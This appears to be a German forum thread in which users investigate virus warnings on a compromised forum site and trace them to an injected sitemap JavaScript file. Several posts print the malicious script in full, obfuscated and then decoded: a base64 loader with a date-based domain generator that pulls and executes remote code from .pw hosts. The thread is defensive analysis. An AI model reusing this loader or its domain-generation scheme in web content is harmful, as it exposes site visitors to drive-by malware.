PC-Welt verseucht?

Hallo,
was ist nur mit dem PC-Welt-Forum los?
Vor wenigen Tagen hatte ich beim Öffnen der Web-Seite eine Virenwarnung bekommen und heute schon wieder eine Warnung (s. Bild)
Wir hier nicht mehr kontrolliert und soll man zukünftig dieses Forum meiden?

 

https://www.virustotal.com/de/url/c...4d7985f266b1a9ebb108f9c5/analysis/1401368643/

 

Kaspersky schlägt immerhin Alarm. Aber da es nur einer ist, kann es auch eine Falschmeldung sein.
https://www.virustotal.com/de/url/b...ad9fea8baa29086d7278aa13/analysis/1401378486/

 

>Wir hier nicht mehr kontrolliert und soll man zukünftig dieses Forum meiden?<

es ist immer wieder schön zu lesen,
wie gläubige Menschen sich einem Computerprogramm unkritisch ausliefern und kühn ihre Umwelt beurteilen

 

Hallo,
das war kein Fehlalarm, wenn Du das meinst.

Zur Zeit ist das Forum erneut kompromittiert, allerdings geht von
xttp://www.pcwelt.de/forum/map/vbulletin_sitemap_forum_13.xml.js => xttp://www.e2badd98.pw/nbe.html?{zufällig}
im Moment keine direkte Gefahr aus.

 

https://www.virustotal.com/de/url/c...4d7985f266b1a9ebb108f9c5/analysis/1402499706/

C-SIRT und Yandex Safebrowsing haben etwas gefunden.

 

Ich habe jetzt erst mal die .pw TLD in den Filter gepackt.

 

Noscript hat sie schon.
Bei der letzten Kontrolle hat die noch gefehlt.

 

Opera 12.17 hat mich nun auch mit einer neuen Funktion überrascht:

Also langsam könnte PCWELT mal ragieren und diesen verseuchten Server/Anbieter rausnehmen.

Ich bin das Risiko trotzdem mal eingegangen, da ich ja aktuell ohnehin Fremdserver blocke beim Besuch der PCWELT-Seite. Und das ist inzwischen schon eine sehr stolze Anzahl...

 

Opera 22 warnt sofort mit knallrotem Bildschirm. Die lassen aber auch per default alle Scripts zu.
Mit Noscript passiert nichts, aber das macht auf Dauer keinen Spaß, wenn demnächst alle Reputationsbasierende Filter sperren und hier im Forum keiner mehr hin kommt.
So etwas verbreitet sich schnell, wie ein Virus.

 

Hallo,
der Angriff kommt nicht von "extern", sondern wie erwähnt von:
xttp://www.pcwelt.de/forum/map/vbulletin_sitemap_forum_13.xml.js

 

Ja, aber das .pw-Zeugs ist auch immer noch drin.

Das bissel Code soll Malware sein?

Code:

function b64dec(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v[i]]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;}var s = document.createElement("SCRIPT");s.text = b64dec("MTI0MDE0OTt2YXIgd3dxcXd3d3dxd3d3d3dxd3dxd3FxcXFxcT0ncXdxcXdxcXF3d3d3cXFxcXd3JztmdW5jdGlvbiBjcmNUYWJsZUcoKXt2YXIgYzt2YXIgY3JjVGFibGUgPSBbXTtmb3IodmFyIG4gPTA7IG4gPCAyNTY7IG4rKyl7YyA9IG47Zm9yKHZhciBrID0wOyBrIDwgODsgaysrKXtjID0gKChjJjEpID8gKDB4RURCODgzMjAgXiAoYyA+Pj4gMSkpIDogKGMgPj4+IDEpKTt9Y3JjVGFibGVbbl0gPSBjO31yZXR1cm4gY3JjVGFibGU7fTtmdW5jdGlvbiBjcmMzMihzdHIpIHt2YXIgY3JjVGFibGUgPSBjcmNUYWJsZUcoKTt2YXIgY3JjID0gMCBeICgtMSk7Zm9yICh2YXIgaSA9IDA7IGkgPCBzdHIubGVuZ3RoOyBpKysgKSB7Y3JjID0gKGNyYyA+Pj4gOCkgXiBjcmNUYWJsZVsoY3JjIF4gc3RyLmNoYXJDb2RlQXQoaSkpICYgMHhGRl07fXJldHVybiAoY3JjIF4gKC0xKSkgPj4+IDA7fTt2YXIgZCA9ICIrPSsiO3ZhciBkYXRlID0gbmV3IERhdGUoKTt2YXIgZGF0ZVN0ciA9IGRhdGUuZ2V0VVRDRnVsbFllYXIoKSArIGQgKyAoZGF0ZS5nZXRVVENNb250aCgpKzEpICsgZCArIGRhdGUuZ2V0VVRDRGF0ZSgpO3dpbmRvdy5yY3RtPWZ1bmN0aW9uKHApe3ZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnU0NSSVBUJyk7IHMudGV4dCA9IGI2NGRlYyhwKS5yZXBsYWNlKC9cMCsvLCcnKTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTt9O3ZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnU0NSSVBUJyk7cy5zcmM9Imh0dHA6Ly8iICsgY3JjMzIoZGF0ZVN0cikudG9TdHJpbmcoMTYpICsgIi5wdy9uYmUuaHRtbD8iK01hdGgucmFuZG9tKCk7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTs=").replace(/\0+/,''); document.body.appendChild(s);

 

Opera benutzt Yandex Safebrowsing, das bereits bei Virustotal angeschlagen hat.

Dann gibt es noch
http://forum.kaspersky.com/index.php?showtopic=297456

Die wissen mehr als wir.

Das war am 30.05 also ist das im Moment eine neue Sache...

 

@magiceye04
"Das bissel Code" in Verbindung mit xttp://e2badd98.pw/nbe.html?{zufällig}, aber derzeitig wird e2badd98.pw nicht gefunden, also besteht, wie schon erwähnt, im Moment keine direkte Gefahr.

 

Nicht direkt. Aber es werden Aufrufe auf externe Server generiert und dieser Code wurde per base64 verschleiert. Zudem werden die Adressen dynamisch über das Datum generiert - d.h. heute schlägt der Virenscanner an und morgen ist er u.U. wieder ruhig... - vielleicht dient das auch als Zeitschalter - d.h. nicht jede generierte Domain muss auch "scharf sein".

Hier der codierte Teil:

Code:

var wwqqwwwwqwwwwwqwwqwqqqqqq='qwqqwqqqwwwwqqqqww';function crcTableG(){var c;var crcTable = [];for(var n =0; n < 256; n++){c = n;for(var k =0; k < 8; k++){c = ((c&1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));}crcTable[n] = c;}return crcTable;};function crc32(str) {var crcTable = crcTableG();var crc = 0 ^ (-1);for (var i = 0; i < str.length; i++ ) {crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];}return (crc ^ (-1)) >>> 0;};var d = "+=+";var date = new Date();var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth()+1) + d + date.getUTCDate();window.rctm=function(p){var s = document.createElement('SCRIPT'); s.text = b64dec(p).replace(/\0+/,''); document.body.appendChild(s);};var s = document.createElement('SCRIPT');s.src="http://" + crc32(dateStr).toString(16) + ".pw/nbe.html?"+Math.random();document.body.appendChild(s);

Wie gesagt, grundsätzlich alles blocken, was aus *.pw kommt.

 

Aha, von wegen nicht extern...
Also für mich sieht dieses .pw schon irgendwie extern aus.
Ich bezweifle, dass das zu PCWELT gehört.
Das war vielleicht mal ein stinknormaler externer Werbeserver, jetzt liefert er halt auch Schadcode aus.

Edit: wie blockt man eigentlich eine komplette TL-Domain in der hosts Datei?
127.0.0.1 .pw
?

Edit2: Na gut, wenn das Script sich auch schon kriminell verhält, dann ist das doch wieder intern.

 

Nein!
Ohne xttp://www.pcwelt.de/forum/map/vbulletin_sitemap_forum_13.xml.js kein xttp://www.e2badd98.pw/nbe.html?{zufällig}

 

Ja, aber diese externen Aufrufe werden auf dem PC-Welt Server selbst generiert. Wenn das keine Absicht ist, müsste man eine Sicherheitslücke in den PC-Welt Servern bzw. der verwendeten Software vermuten. Die vBulletin Version ist nun alles andere als frisch.

 

Hat mich auch gerade mit gleicher Meldung überrascht, auch wenn ich gestern bzw. heute morgen auch mit dem 12.17 hier war und es problemlos ohne "Info" ablief.
Der ist nun schon längere Zeit (seit Erscheinen) installiert.
Eigentlich gibt es im Operaprogramm keine Aktualisierung auf "unerwünschte Seiten" - wüsste es jedenfalls nicht, wenn keine neue Operaversion aufgespielt wurde.
Warum nicht ab und zu mal Überraschungen

 

Diese Meldung kommt aber nur von den beiden Operaversionen 12.17 und 22.0.147.50 und das eben seit ca. gestern Mittag.
Habe nun mal den FF 30 genommen und da ist Ruhe.